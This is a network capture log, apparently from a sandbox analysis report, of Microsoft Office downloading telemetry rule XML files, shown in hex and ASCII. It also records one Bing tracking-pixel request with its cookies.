                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:44 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 407
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9D30478D"
                                                                                                                                                                                                            x-ms-request-id: 4ad18980-501e-008c-067e-3bcd39000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141744Z-1777c6cb754dqb2khC1TEBmk1s0000000b80000000003r8n
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:44 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            91192.168.2.64980513.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:44 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:44 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 474
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                                                            x-ms-request-id: 164a21a0-201e-00aa-18b8-3b3928000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141744Z-r1d97b995774zjnrhC1TEBv1ww0000000aag00000000h0en
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:44 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            92192.168.2.64980613.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:44 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:44 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 408
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                                                            x-ms-request-id: ecab23c4-c01e-00ad-2963-3ba2b9000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141744Z-178bfbc474b9fdhphC1NYCac0n00000001m0000000003v10
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:45 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            93192.168.2.64980713.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:45 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:45 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 469
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                                                            x-ms-request-id: 89429c71-e01e-0003-137d-3b0fa8000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141745Z-1777c6cb754rz2pghC1TEBghen0000000b3g00000000anhx
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:45 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            94192.168.2.64980813.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:45 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:45 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 416
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                                                            x-ms-request-id: 93d7ba64-801e-002a-7fce-3b31dc000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141745Z-r1d97b99577mrt4rhC1TEBftkc0000000a9000000000fkh4
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:45 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            95192.168.2.64981013.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:46 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:46 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B91EAD002"
                                                                                                                                                                                                            x-ms-request-id: e2ff131b-f01e-0085-7676-3b88ea000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141746Z-1777c6cb7549j9hhhC1TEBzmcc0000000b2g00000000fgue
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:47 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            96192.168.2.64981813.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:46 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:47 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 432
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                                                            x-ms-request-id: de17e165-601e-0002-3161-3ba786000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141747Z-178bfbc474bv7whqhC1NYC1fg400000001eg00000000rxft
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:47 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            97192.168.2.64981713.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:46 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:47 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 475
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BBA740822"
                                                                                                                                                                                                            x-ms-request-id: 9f80fcc3-101e-0065-17c1-3b4088000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141747Z-r1d97b995777mdbwhC1TEBezag0000000abg00000000k126
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:47 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            98192.168.2.6498212.23.209.193443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:46 UTC444OUTGET /aes/c.gif?RG=41c7e0b79ab94421a2b63b416764f363&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20241121T141739Z&adUnitId=11730597&localId=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&deviceId=6966555320912735&anid=DA18C8825356BAC4E7B23066FFFFFFFF HTTP/1.1
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                                                                                                                            Host: www.bing.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cookie: MUID=30952A2DA9F56E753E2F3F13A8976F69
                                                                                                                                                                                                            2024-11-21 14:17:47 UTC777INHTTP/1.1 200 OK
                                                                                                                                                                                                            Cache-Control: private,no-store
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            Vary: Origin
                                                                                                                                                                                                            P3P: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: E1B2DEA25BE64BD6BB8F09AD208BAED5 Ref B: FRA31EDGE0817 Ref C: 2024-11-21T14:17:47Z
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:47 GMT
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: _EDGE_S=SID=1B1737814BED6B923F2F22BF4A416AEE; path=/; httponly; domain=bing.com
                                                                                                                                                                                                            Set-Cookie: MUIDB=30952A2DA9F56E753E2F3F13A8976F69; path=/; httponly; expires=Tue, 16-Dec-2025 14:17:47 GMT
                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=93600
                                                                                                                                                                                                            X-CDN-TraceID: 0.33d01702.1732198667.1e421dbe


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            99192.168.2.64981913.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:47 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:47 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB464F255"
                                                                                                                                                                                                            x-ms-request-id: 9d7b10d0-e01e-0099-63bc-3bda8a000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141747Z-r1d97b995774zjnrhC1TEBv1ww0000000a9g00000000m5kr
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:47 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            100192.168.2.64982013.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
